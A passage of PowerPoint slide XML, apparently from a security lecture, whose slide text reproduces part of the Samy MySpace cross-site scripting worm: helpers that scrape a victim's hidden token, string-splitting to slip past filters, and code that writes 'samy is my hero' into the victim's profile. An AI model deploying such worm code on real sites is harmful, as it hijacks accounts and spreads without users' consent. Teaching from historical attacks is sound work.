                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Type','application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/x-www-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>formurlencoded</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>J.setRequestHeader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>('Content-Length',</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>BK.length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>)}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>J.send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(BK);return true}function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>findIn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(BF,BB,BC){var R=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>BF.indexOf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(BB)+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>BB.length;var</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>S=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>BF.substring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(R,R+1024);return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>S.substring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(0,S.indexOf(BC))}function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>getHiddenParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(BF,BG){return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>findIn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>BF,'name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>='+B+BG+B+' value='+B,B)}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>getFromURL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(BF,BG){var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>T;if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(BG=='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Mytoken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>'){T=B}else{T='&amp;'}var U=BG+'=';var V=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>BF.indexOf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(U)+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>U.length;var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> W=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>BF.substring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(V,V+1024);var</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>X=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>W.indexOf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(T);var Y=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>W.substring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(0,X);return Y}function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>getXMLObj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(){var Z=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>false;if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>window.XMLHttpRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>){try{Z=new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>XMLHttpRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>()}catch(e)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>{Z=false}}else if(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>window.ActiveXObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>){try{Z=new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ActiveXObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>('Msxml2.XMLHTTP')}catch(e){try{Z=new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ActiveXObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Microsoft.XMLHTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>')}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>catch(e){Z=false}}}return Z}var AA=g();var AB=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>AA.indexOf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>('m'+'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ycode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>');var AC=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>AA.substring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(AB,AB+4096);var AD=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>AC.indexOf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>('D'+'IV');var</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>AE=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>AC.substring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(0,AD);var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>AF;if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(AE){AE=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>AE.replace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>jav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>'+'a',A+'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>jav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>'+'a');AE=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>AE.replace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>exp'+'r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>)','</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>exp'+'r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>)'+A);AF=' but most of all, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>samy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> is my hero.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>d'+'iv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> id='+AE+'D'+'IV&gt;'}var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>AG;function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>getHome</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(){if(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>J.readyState</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>!=4){return}var AU=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>J.responseText;AG</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>findIn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(AU,'P'+'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>rofileHeroes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>','&lt;/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>td&gt;');AG=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
